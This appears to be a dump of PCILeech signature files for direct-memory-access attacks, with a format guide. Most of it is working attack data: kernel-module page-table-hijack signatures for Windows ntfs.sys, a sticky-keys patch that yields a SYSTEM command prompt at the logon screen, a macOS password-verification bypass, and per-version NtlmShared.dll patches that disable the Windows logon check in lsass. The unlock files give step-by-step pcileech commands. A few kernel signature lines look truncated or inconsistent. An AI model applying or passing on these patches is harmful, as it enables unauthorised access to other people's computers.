# Configuration data for the Windows 8.1/10/2012R2/2016 page table hijack signature generator.
# The signatures for the page table hijack attack require two full pages (8192 bytes) of binary
# code taken from Microsoft binaries. To avoid redistributing potentially copyrighted Microsoft
# code, only the hashes of the required pages are stored here (64 hex digits each, consistent
# with SHA-256) and users of PCILeech extract the pages themselves from a matching ntfs.sys; the
# hashes identify the exact page contents the generator expects.
#
# Each line represents a signature and populates a c-struct entry as per below:
#
# {
# .szSignatureInfoDisplay = "ntfs.sys signed on 2014-10-15 (Windows 8.1 x64)",
# .szFileName = "win8x64_ntfs_20141015.kmd",
# .szSignatureInfo = "# ntfs.sys signed on 2014-10-15 (MJ_CREATE)",
# .dwOffset1 = 0xd3000,
# .dwOffset2 = 0x4a000,
# .szHash1 = "1ac5c0df47e153480fc49bb3687df84473168bd65b4bb58ab3885f47a6116d1b",
# .szHash2 = "a65cf907fb5aecb5d2a256b8a49706469025c740a896e3a8d0b27537f6fbbc6f",
# .szSignatureData = ",d3920,DEFAULT_WINX64_STAGE1,4ad80,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,010003804a000100210001800a0003800c00018054010100080000001b00018001000000"
# },
#
#
ntfs.sys signed on 2014-10-15 (Windows 8.1 x64);win8x64_ntfs_20141015.kmd;# ntfs.sys signed on 2014-10-15 (MJ_CREATE);0xd3000;0x4a000;1ac5c0df47e153480fc49bb3687df84473168bd65b4bb58ab3885f47a6116d1b;a65cf907fb5aecb5d2a256b8a49706469025c740a896e3a8d0b27537f6fbbc6f;,d3920,DEFAULT_WINX64_STAGE1,4ad80,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,010003804a000100210001800a0003800c00018054010100080000001b00018001000000
ntfs.sys signed on 2015-12-30 (Windows 8.1 x64);win8x64_ntfs_20151230.kmd;# ntfs.sys signed on 2015-12-30 (MJ_CREATE);0xd1000;0x49000;65b0b0cf8a508d20cb6906fe4fea9e10a1c4398c4f5c4bbbc366383e06572695;6387547a0a12d5814681f0ed5fc47cd6aa31e8b4428bee8cf18081bb8ab57d67;,d1190,DEFAULT_WINX64_STAGE1,49d80,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,0100038049000100200001800a0003800c00018054010100080000001b00018001000000
ntfs.sys signed on 2017-09-09 (Windows 8.1 x64);win8x64_ntfs_20170909.kmd;# ntfs.sys signed on 2017-09-09 (MJ_CREATE);0xd0000;0x49000;a8857d9011802d52075b70854b2f7b83fc05b66e12bf212fbaee97779958afd8;3121c422abd92bba47dba5f660bc72e94b3ee5703857763b1b6498730499bc52;,d0c80,DEFAULT_WINX64_STAGE1,49d80,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,0100038049000100210001800a0003800c00018052010100080000001b00018001000000
ntfs.sys signed on 2016-02-23 (Windows 10 x64);win10x64_ntfs_20160223.kmd;# ntfs.sys signed on 2016-02-23 (MJ_CREATE);0xca000;0x4f000;0592b0387ec943697dd0f552564e087c8dd385b25db565ffb11fa6bd1cf10b14;218325e192e8146883054359e984376be0d13486c05d31ab4a23ff834ebb623e;,ca770,DEFAULT_WINX64_STAGE1,4fe38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,010003804f00010023000180080003801400018066010100050000001d00018001000000
ntfs.sys signed on 2015-12-01 (Windows 10 x64);win10x64_ntfs_20151201.kmd;# ntfs.sys signed on 2015-12-01 (MJ_CREATE);0xc5000;0x4d000;3bac25cd0e0cfc45dcb7efa67200e4800ffe8278fd3249a382bd4403f3309756;fcc23d38f37141010e2985cc2c7babc8796c36e85b820d77d5c6b4fe66c6caf0;,c51e0,DEFAULT_WINX64_STAGE1,4dd30,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,010003804d00010022000180080003801400018061010100050000001d00018001000000
ntfs.sys signed on 2015-07-30 (Windows 10 x64);win10x64_ntfs_20150730.kmd;# ntfs.sys signed on 2015-07-30 (MJ_CREATE);0xc4000;0x4d000;cd135fc58b88f96abff0ddb1207cb9e84e5b2f040607d0500de0018d32ad1572;2cfd3b597b341c056a30a186b1347d82d211cf1319464ad1f13cfa525891e409;,c4dc0,DEFAULT_WINX64_STAGE1,4dd20,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,010003804d00010022000180080003801400018061010100050000001d00018001000000
ntfs.sys signed on 2015-07-17 (Windows 10 x64);win10x64_ntfs_20150717.kmd;# ntfs.sys signed on 2015-07-17 (MJ_CREATE);0x1f000;0x4d000;9ac57fa7e7d8d92e066c6ce9c76c82fc3afccc1e6211eb4d9b03ea79c8a70b3b;2cfd3b597b341c056a30a186b1347d82d211cf1319464ad1f13cfa525891e409;,1fb90,DEFAULT_WINX64_STAGE1,4dd20,DEFAULT_WINX64_STAGE2.bin,0,DEFAULT_WINX64_STAGE3,0,010003804d00010022000180080003801400018061010100050000001d00018001000000
ntfs.sys signed on 2015-07-10 (Windows 10 x64);win10x64_ntfs_20150710.kmd;# ntfs.sys signed on 2015-07-10 (MJ_CREATE);0xc4000;0x4d000;a8a4e0d7963c2652226064c674b7ed38b1f84a8661e8f63663783dafb83271fc;95964341fb3121baf303037a3796bd98c4167261ead9a4b4587a31e8a546dda1;,c4ec0,DEFAULT_WINX64_STAGE1,4dd20,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,010003804d00010022000180080003801400018062010100050000001d000180
ntfs.sys signed on 2016-03-29 (Windows 10 x64);win10x64_ntfs_20160329.kmd;# ntfs.sys signed on 2016-03-29 (MJ_CREATE);0xca000;0x4f000;d091d4d5452ef388c6ff22780922f3f944a8439e5109dae207151f7f4fd23991;84b0ffd20272e8757023975ef52132c9e82df7e81da537cf436407733a1f4957;,ca770,DEFAULT_WINX64_STAGE1,4fe38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,010003804f00010023000180080003801400018066010100050000001d000180
ntfs.sys signed on 2016-08-03 (Windows 10 x64) [10.0.10240.17071];win10x64_ntfs_20160803_10240.kmd;# ntfs.sys signed on 2016-08-03 (MJ_CREATE) [10.0.10240.17071];0xc5000;0x4d000;c80d2ff8c58669a539ecc636103a73eb8c65a4568c81d6627a9b14f428d0207f;bafe68ca0561d5137504c53360cdec01b8d522eade7e558b90231fdaf53a66a5;,c51e0,DEFAULT_WINX64_STAGE1,4de38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,010003804d00010022000180080003801400018061010100050000001d00018001000000
ntfs.sys signed on 2017-09-19 (Windows 10 x64) [10.0.10240.17643];win10x64_ntfs_20170919_10240.kmd;# ntfs.sys signed on 2017-09-19 (MJ_CREATE) [10.0.10240.17643];0xdd000;0x1ec000;3f688bfd33764abc387ed1ffe57ee287cb4726ef58fb88f104a350d62f25b240;950b63465d1982cc41108376717f8dda508c3778b6358ce21e4272c7e75a1306;,dd7b0,DEFAULT_WINX64_STAGE1,1ece38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,010003804d00010022000180080003801400018061010100050000001d00018001000000
ntfs.sys signed on 2016-07-16 (Windows 10 x64) [10.0.14393.0];win10x64_ntfs_20160716_14393.kmd;# ntfs.sys signed on 2016-07-16 (MJ_CREATE) [10.0.14393.0];0xf6000;0x53000;5cadebe69115cc66e07f7d1e3f97ad0522840c1c648d33b37d8fe9f9a36ae413;04d501dae7a097b649edc0bb68dc02036e31ece8c30ee48ab24ac8fb3095fe46;,f6b70,DEFAULT_WINX64_STAGE1,53e38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,0100038053000100240001800800038014000180760101000500000022000180
ntfs.sys signed on 2016-08-20 (Windows 10 x64) [10.0.14393.103];win10x64_ntfs_20160820_14393.kmd;# ntfs.sys signed on 2016-08-20 (MJ_CREATE) [10.0.14393.103];0xf6000;0x53000;c6b3a2c6a9d19798b9974704e551a4798d0f2098279a67924eebcb03cee07590;04d501dae7a097b649edc0bb68dc02036e31ece8c30ee48ab24ac8fb3095fe46;,f6b70,DEFAULT_WINX64_STAGE1,53e38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,0100038053000100240001800800038014000180760101000500000022000180
ntfs.sys signed on 2016-09-07 (Windows 10 x64) [10.0.14393.187];win10x64_ntfs_20160907_14393.kmd;# ntfs.sys signed on 2016-09-07 (MJ_CREATE) [10.0.14393.187];0xf7000;0x53000;e6f94244f8ab0cb45a2509679a15ebbb933c936c23d0c600116124b4aebf67d5;04d501dae7a097b649edc0bb68dc02036e31ece8c30ee48ab24ac8fb3095fe46;,f78e0,DEFAULT_WINX64_STAGE1,53e38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,0100038053000100240001800800038014000180760101000500000022000180
ntfs.sys signed on 2016-11-02 (Windows 10 x64) [10.0.14393.447];win10x64_ntfs_20161102_14393.kmd;# ntfs.sys signed on 2016-11-02 (MJ_CREATE) [10.0.14393.447];0xf7000;0x53000;e044cff9460a778a04e75081dbfa7441bd1b142a9798a2c978c28612f33682c3;04d501dae7a097b649edc0bb68dc02036e31ece8c30ee48ab24ac8fb3095fe46;,f78e0,DEFAULT_WINX64_STAGE1,53e38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,0100038053000100240001800800038014000180760101000500000022000180
ntfs.sys signed on 2017-03-04 (Windows 10 x64) [10.0.14393.953];win10x64_ntfs_20170304_14393.kmd;# ntfs.sys signed on 2017-03-04 (MJ_CREATE) [10.0.14393.953];0xf7000;0x53000;228a30faacc59dd6b41fab0a5eab73e30ee774fde51e4ee30a8501f81cfe8e54;6c4742133e9409255abb3c3d21eca24e7f303b4968e703acfe4f3e3f4e39ce36;,f78f0,DEFAULT_WINX64_STAGE1,53e38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,0100038053000100240001800800038014000180760101000500000022000180
ntfs.sys signed on 2017-04-28 (Windows 10 x64) [10.0.14393.1198];win10x64_ntfs_20170428_14393.kmd;# ntfs.sys signed on 2017-04-28 (MJ_CREATE) [10.0.14393.1198];0xf7000;0x53000;1546b88e89466c8602690714ca39ddfde499a3f33a5869747530cb060daf8923;0a9519910b85e243dde74efa9e9f205e182ef166048bd0fe29ff0618df10ba3d;,f78f0,DEFAULT_WINX64_STAGE1,53e38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,0100038053000100240001800800038014000180760101000500000022000180
ntfs.sys signed on 2017-09-18 (Windows 10 x64) [10.0.14393.1770];win10x64_ntfs_20170918_14393.kmd;# ntfs.sys signed on 2017-09-18 (MJ_CREATE) [10.0.14393.1770];0xf7000;0x53000;d1cf002a0c0db5927ae3e0bacdb1f52fb283416e23e1d42387bae39a3f384cb3;2138340b1aabd7f419293f82683c6dde30937214f29b3d83791c13be00da50db;,f7a10,DEFAULT_WINX64_STAGE1,53e38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,0100038053000100240001800800038014000180760101000500000022000180
ntfs.sys signed on 2017-03-18 (Windows 10 x64) [10.0.15063.0];win10x64_ntfs_20170318_15063.kmd;# ntfs.sys signed on 2017-03-18 (MJ_CREATE) [10.0.15063.0];0xcb000;0x55000;f190019c227cbbbd19e9ed6fb840e9838afab598b9ac23a3008d60fb3b139845;b48ce1f64615ae1e734d36f94c0c41cce4e5f6caab58df0121ca6f27e8569599;,cb2e0,DEFAULT_WINX64_STAGE1,55e38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,01000380550001002800018008000380150001807f0101000500000023000180
ntfs.sys signed on 2017-09-30 (Windows 10 x64) [10.0.15063.674];win10x64_ntfs_20170930_15063.kmd;# ntfs.sys signed on 2017-09-30 (MJ_CREATE) [10.0.15063.674];0xcb000;0x219000;c1627584ba74d093e74760e12d5c74e0549d5d768f4ec462d55eedfe8dd74d98;871a6f00aea79f7bfd79d23cd3d72d9ae0f7cf7b344ac5f5e9511a641c202348;,cb390,DEFAULT_WINX64_STAGE1,219e38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,01000380550001002800018008000380150001807f0101000500000023000180
ntfs.sys signed on 2017-11-02 (Windows 10 x64) [10.0.15063.726];win10x64_ntfs_20171102_15063.kmd;# ntfs.sys signed on 2017-11-02 (MJ_CREATE) [10.0.15063.726];0xcb000;0x219000;b67b714d8ba13a16ef64df94347b2ce373b2447c59a7a723579d1391b1c8c160;1de51f66634410d684aa5764646472e7bd51c3e380308d7418400665168d2c09;,cb3a0,DEFAULT_WINX64_STAGE1,219e38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,01000380550001002800018008000380150001807f0101000500000023000180
ntfs.sys signed on 2017-10-10 (Windows 10 x64) [10.0.16299.19];win10x64_ntfs_20171010_16299.kmd;# ntfs.sys signed on 2017-10-10 (MJ_CREATE) [10.0.16299.19];0xf6000;0x22c000;55b6529027827c433303454a3bfd0fc540bfcb7163089bb4650fb578999db299;8bdfd5302c2521f1a723ef61bdc2543f52bd9a6748d6bb2788ab4ff8ed87dd6f;,f6120,DEFAULT_WINX64_STAGE1,22ce38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,010003805a0001002900018008000380150001808c0101000500000023000180
ntfs.sys signed on 2018-02-10 (Windows 10 x64) [10.0.16299.248];win10x64_ntfs_20180210_16299.kmd;# ntfs.sys signed on 2018-02-10 (MJ_CREATE) [10.0.16299.248];0xd5000;0x22a000;f7d9b1cb758ad97d9070fdfefcc09fe53ba6d42a5fe2d9074a3aa97f7ef95ddf;61c552bc451be0d577fc9828ab6ebed62dc117f17265a5f8c42013f1d843285e;,d5640,DEFAULT_WINX64_STAGE1,22ae38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,01000380590001002900018008000380150001808b0101000500000023000180
================================================
FILE: files/signature_info.txt
================================================
Signature Guide for Search/Patch signatures and Kernel Module signatures
========================================================================
GENERAL
=======
Signature files are read line by line and may contain multiple signature
lines; the one exception is kernel module inserts by page table hijack, whose
signature files may only contain a single signature line. Each line is either
a comment (starting with '#') or a signature line. Signature lines are comma
separated and divided into 'chunks'. Each chunk consists of an 'offset' and a
'data' section. The offset is a hexadecimal dword. The data section is binary
data given in one of the following forms:
- = no data.
DEFAULT_ = data loaded from builtin pre-defined shellcodes.
ASCIIHEX = data as asciihex.
FILENAME = file name to load binary data from.
EXAMPLE:
B60,FF15C207,0,-,1aab00,file.bin
The example contains three chunks.
chunk[0] = offset B60 and data FF15C207.
chunk[1] = offset 0 and no data.
chunk[2] = offset 1aab00 and data loaded from file.
MEMORY PATCH SIGNATURE FORMAT
=============================
A memory patch signature file has the extension '.sig'. A file may contain
multiple memory patch signatures. A memory patch signature consists of exactly
three (3) chunks. Memory patch signatures support wildcard and relative offsets
in addition to the standard in-page offset.
chunk[0] = search pattern 'data' at 'offset' distance from page base.
chunk[1] = search pattern 'data' at 'offset' distance from page base.
only searched in the same page as chunk[0], and only if chunk[0] matched.
optional. if not used specify data: '-'
chunk[2] = replace contents with 'data' at distance 'offset' from page base.
Note that chunk[2] overwrites target memory in place wherever chunk[0] (and
chunk[1]) match, so keep the search patterns specific enough that a false
positive match cannot patch unrelated memory.
MEMORY PATCH SIGNATURES - WILDCARD AND RELATIVE OFFSETS
=======================================================
- Memory patch signatures support in-page fixed offsets in all signature chunks
Examples: 0 ; e0 ; ee0.
- Wildcard offsets are supported in signature chunks 0 and 1, but not in chunk 2,
which is the chunk containing the patch data. A wildcard offset is denoted by '*'.
Example: *
- Relative offsets are supported only in signature chunk 1 and 2. The relative
offset is not supported in signature chunk 0. Relative offsets are calculated
from the offset in chunk 0. Relative offsets can be combined with a wildcard
offset in chunk 0. A relative offset is given by r and then the offset as a
32-bit DWORD in hex.
Examples: r0 ; r1F0 ; rFFFFFFF0 (negative offset of 0x10)
KERNEL MODULE SIGNATURE FORMAT #1 - memory search
=================================================
The default format for kernel signatures is the memory search format. This is
used by PCILeech to search the memory for a signature, which is then patched.
Note that only fixed in-page offsets are supported in kernel module signatures.
chunk[0] = search pattern 'data' at 'offset' distance from page base.
This page contains the function to be overwritten by stage #1 code.
chunk[1] = search pattern 'data' at 'offset' distance from page base.
Stage #2 code will be placed in this page.
chunk[2] = offset to where to place stage #1 code, and stage #1 code.
chunk[3] = offset to where to place stage #2 code, and stage #2 code.
chunk[4] = <offset not in use>, and stage #3 code.
KERNEL MODULE SIGNATURE FORMAT #2 - page table hijack
=====================================================
The page table hijack format is used when a page table needs to be hijacked in
order to gain execution (if the targeted executable memory is above 4GB). Note
that only fixed in-page offsets are supported in kernel module signatures.
chunk[0] = <offset not in use>, 4096-bytes of original page bytes for page in
which stage #1 code should be placed.
chunk[1] = <offset not in use>, 4096-bytes of original page bytes for page in
which stage #2 code should be placed.
chunk[2] = offset to where to place stage #1 code, and stage #1 code.
chunk[3] = offset to where to place stage #2 code, and stage #2 code.
chunk[4] = <offset not in use>, and stage #3 code.
chunk[5] = <offset not in use>, "driver signature"
================================================
FILE: files/stickykeys_cmd_win.sig
================================================
# replace sethc.exe with cmd.exe in memory on Windows
# Signature for PCILeech version 1.1
# syntax: see signature_info.txt for more information.
#
# Signature by Ian Vitek (Sigtrap)
#
# The signature is only found after sticky keys have been activated at least once.
# (Finding the signature in memory is not 100% reliable, but fiddling around
# with sticky keys will in the end leave sethc.exe in memory.)
# So, press SHIFT five times to start sethc.exe, then patch with this signature.
# Close the Sticky Keys dialog and press SHIFT five times again
# to get cmd.exe with SYSTEM privileges at the logon screen.
#
# Windows x64 all versions [20160906]
*,00730065007400680063002E00650078006500200025006C006400000000000000730065007400680063002E006500780065,0,-,r0,0063006D0064002E0065007800650020002000200025006C00640000000000000063006D0064002E00650078006500200020
================================================
FILE: files/unlock_macos.sig
================================================
# unlock signatures for macOS
# syntax: see signature_info.txt for more information.
#
#
# CFOpenDirectory!ODRecordVerifyPassword (various versions)
*,080000004C89F7E83EC40000EB0231DB88D84883C4685B415C415D415E415F5D,0,-,r10,b001
*,080000004C89F7E81AC40000EB0231DB88D84883C4685B415C415D415E415F5D,0,-,r10,b001
================================================
FILE: files/unlock_win10x64.sig
================================================
# Unlock Signatures for Local and AD Accounts for Windows 10 x64 version
#
# Method 1 (faster, limits the search to the lsass.exe process):
# 1.1 find the pid of lsass.exe: pcileech pslist
# 1.2 patch: pcileech patch -sig unlock_win10x64.sig -all -pid <pid_of_lsass>
#
# Method 2 (searches all memory):
# 2.1 patch: pcileech patch -sig unlock_win10x64.sig -all
#
# Note: the patch alters the in-memory NtlmShared.dll logon check (see the
# per-version signatures below: a conditional jump is NOP:ed or inverted).
# The change exists only in RAM and is presumably undone by a reboot; a host
# unlocked this way should not be considered trustworthy afterwards.
#
# Syntax: see signature_info.txt for more information.
# Generated on 2024-12-09 18:16:15
#
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.16384 / 2015-07-10]
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.18366 / 2019-09-30]
5DC,488BCBFF154B1C0000,5E8,0F8518FBFFFF,5E8,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.19387 / 2022-08-04]
65C,488BCBFF15CB1B0000,668,0F8518FBFFFF,668,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.19869 / 2023-03-30]
66C,488BCBFF15BB1B0000,678,0F8518FBFFFF,678,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.10586.0 / 2015-10-30]
62C,488BCBFF15B31B0000,638,0F8518FBFFFF,638,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.0 / 2016-07-16]
6DC,488BCBFF15D31B0000,6E8,0F8518FBFFFF,6E8,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.2791 / 2019-02-06]
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.3269 / 2019-09-29]
6EC,488BCBFF15C31B0000,6F8,0F8518FBFFFF,6F8,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.5291 / 2022-08-07]
76C,488BCBFF15431B0000,778,0F8518FBFFFF,778,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.5850 / 2023-03-30]
77C,488BCBFF15331B0000,788,0F8518FBFFFF,788,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.15063.1631 / 2019-02-06]
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.15063.2106 / 2019-09-30]
622,488BCBFF15B51C0000,62E,0F852EFBFFFF,62E,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.15254.245 / 2018-01-30]
612,488BCBFF15C51C0000,61E,0F852EFBFFFF,61E,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.1268 / 2019-07-05]
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.1448 / 2019-10-02]
622,488BCBFF15C51C0000,62E,0F852EFBFFFF,62E,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.192 / 2018-01-01]
612,488BCBFF15D51C0000,61E,0F852EFBFFFF,61E,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.1067 / 2019-10-02]
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.590 / 2019-02-06]
6A2,488BCBFF15451C0000,6AE,0F852EFBFFFF,6AE,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.523 / 2019-01-01]
692,488BCBFF15551C0000,69E,0F852EFBFFFF,69E,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.10935 / 2022-08-05]
7CD,488BCBFF15221B0000,7D9,0F840BFBFFFF,7D9,0F85
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.194 / 2018-12-04]
73D,488BCBFF15B21B0000,749,0F840BFBFFFF,749,0F85
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.316 / 2019-02-06]
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.802 / 2019-10-02]
74D,488BCBFF15A21B0000,759,0F840BFBFFFF,759,0F85
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.5122 / 2023-11-08]
7DD,488BCBFF15121B0000,7E9,0F840BFBFFFF,7E9,0F85
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.1 / 2019-03-18]
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.10022 / 2019-09-15]
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.418 / 2019-10-06]
72F,488BCBFF15C01B0000,73B,0F8409FBFFFF,73B,0F85
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.1 / 2019-12-07]
423,488BCB48FF1553200000,435,0F84BAFAFFFF,435,0F85
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.2728 / 2023-03-09]
4B3,488BCB48FF15C31F0000,4C5,0F84BAFAFFFF,4C5,0F85
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.2965 / 2023-04-27]
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.3636 / 2023-10-20]
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.3684 / 2023-10-17]
4C3,488BCB48FF15B31F0000,4D5,0F84BAFAFFFF,4D5,0F85
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.4474 / 2024-05-18]
583,488BCB48FF15F31E0000,595,0F84BAFAFFFF,595,0F85
================================================
FILE: files/unlock_win10x86.sig
================================================
# Unlock Signatures for Local and AD Accounts for Windows 10 x86 version
#
# Method 1 (faster, limits the search to the lsass.exe process):
# 1.1 find the pid of lsass.exe: pcileech pslist
# 1.2 patch: pcileech patch -sig unlock_win10x86.sig -all -pid <pid_of_lsass>
#
# Method 2 (searches all memory):
# 2.1 patch: pcileech patch -sig unlock_win10x86.sig -all
#
# Note: the patch alters the in-memory NtlmShared.dll logon check (see the
# per-version signatures below: a conditional jump is NOP:ed or inverted).
# The change exists only in RAM and is presumably undone by a reboot; a host
# unlocked this way should not be considered trustworthy afterwards.
#
# Syntax: see signature_info.txt for more information.
# Generated on 2024-12-09 18:16:15
#
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.10240.16384 / 2015-07-10]
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.10240.18366 / 2019-09-30]
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.10240.19387 / 2022-08-04]
507,56FF151C610010,510,0F8598FBFFFF,510,909090909090
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.10240.19869 / 2023-03-30]
517,56FF151C610010,520,0F8598FBFFFF,520,909090909090
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.10586.0 / 2015-10-30]
627,56FF15F0600010,630,0F8598FBFFFF,630,909090909090
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.14393.2791 / 2019-02-06]
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.14393.3269 / 2019-09-29]
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.14393.5291 / 2022-08-07]
7A7,56FF15F8700010,7B0,0F8598FBFFFF,7B0,909090909090
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.14393.5850 / 2023-03-30]
7B7,56FF15F8700010,7C0,0F8598FBFFFF,7C0,909090909090
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.15063.1631 / 2019-02-06]
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.15063.2106 / 2019-09-29]
79E,56FF15F8600010,7A7,0F8584FBFFFF,7A7,909090909090
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.15254.158 / 2018-01-03]
78E,56FF15F8600010,797,0F8584FBFFFF,797,909090909090
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.16299.1448 / 2019-10-02]
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.16299.967 / 2019-02-06]
7AE,56FF15F0600010,7B7,0F8584FBFFFF,7B7,909090909090
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.16299.192 / 2018-01-01]
79E,56FF15F0600010,7A7,0F8584FBFFFF,7A7,909090909090
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.17134.1067 / 2019-10-02]
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.17134.590 / 2019-02-06]
83E,57FF15F4700010,847,0F8573FBFFFF,847,909090909090
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.17134.407 / 2018-11-01]
81E,57FF15F4700010,827,0F8573FBFFFF,827,909090909090
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.17763.107 / 2018-10-27]
7F9,57FF15F4600010,802,0F8463FBFFFF,802,0F85
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.17763.10935 / 2022-08-05]
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.17763.316 / 2019-02-06]
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.17763.802 / 2019-10-02]
819,57FF15F4600010,822,0F8463FBFFFF,822,0F85
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.17763.4964 / 2023-09-14]
829,57FF15F4700010,832,0F8463FBFFFF,832,0F85
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.18362.418 / 2019-10-06]
80B,57FF15F4600010,814,0F8461FBFFFF,814,0F85
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.19040.1 / 2019-12-06]
CA8,57FF1598B10010,CB1,0F8463FBFFFF,CB1,0F85
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.19041.2673 / 2023-02-16]
C28,57FF1598B10010,C31,0F8463FBFFFF,C31,0F85
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.19041.2965 / 2023-04-27]
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.19041.3505 / 2023-08-19]
C38,57FF1598B10010,C41,0F8463FBFFFF,C41,0F85
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.19041.4474 / 2024-05-18]
CB8,57FF1598B10010,CC1,0F8463FBFFFF,CC1,0F85
================================================
FILE: files/unlock_win11x64.sig
================================================
# Unlock Signatures for Local and AD Accounts for Windows 11 x64 version
#
# Method 1 (faster - restricts the patch scan to the lsass.exe process via -pid):
# 1.1 check pid of lsass.exe: pcileech pslist
# 1.2 patch: pcileech patch -sig unlock_win11x64.sig -all -pid <pid_of_lsass>   (this file is named unlock_win11x64.sig)
#
# Method 2 (slower - no -pid filter):
# 2.1 patch: pcileech patch -sig unlock_win11x64.sig -all
#
# Syntax: see signature_info.txt for more information.
# Generated on 2025-04-18 19:09:03
#
#
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.20348.1668 / 2023-03-30]
A7B,488BCB48FF15A3280000,A8D,0F84B2FAFFFF,A8D,0F85
#
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.20348.887 / 2022-08-04]
A6B,488BCB48FF15B3280000,A7D,0F84B2FAFFFF,A7D,0F85
#
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.1696 / 2023-03-09]
00B,488BCB48FF15E3220000,01D,0F84B2FAFFFF,01D,0F85
#
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.2600 / 2023-11-08]
01B,488BCB48FF15D3220000,02D,0F84B2FAFFFF,02D,0F85
#
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.778 / 2022-06-18]
F8B,488BCB48FF1563230000,F9D,0F84B2FAFFFF,F9D,0F85
#
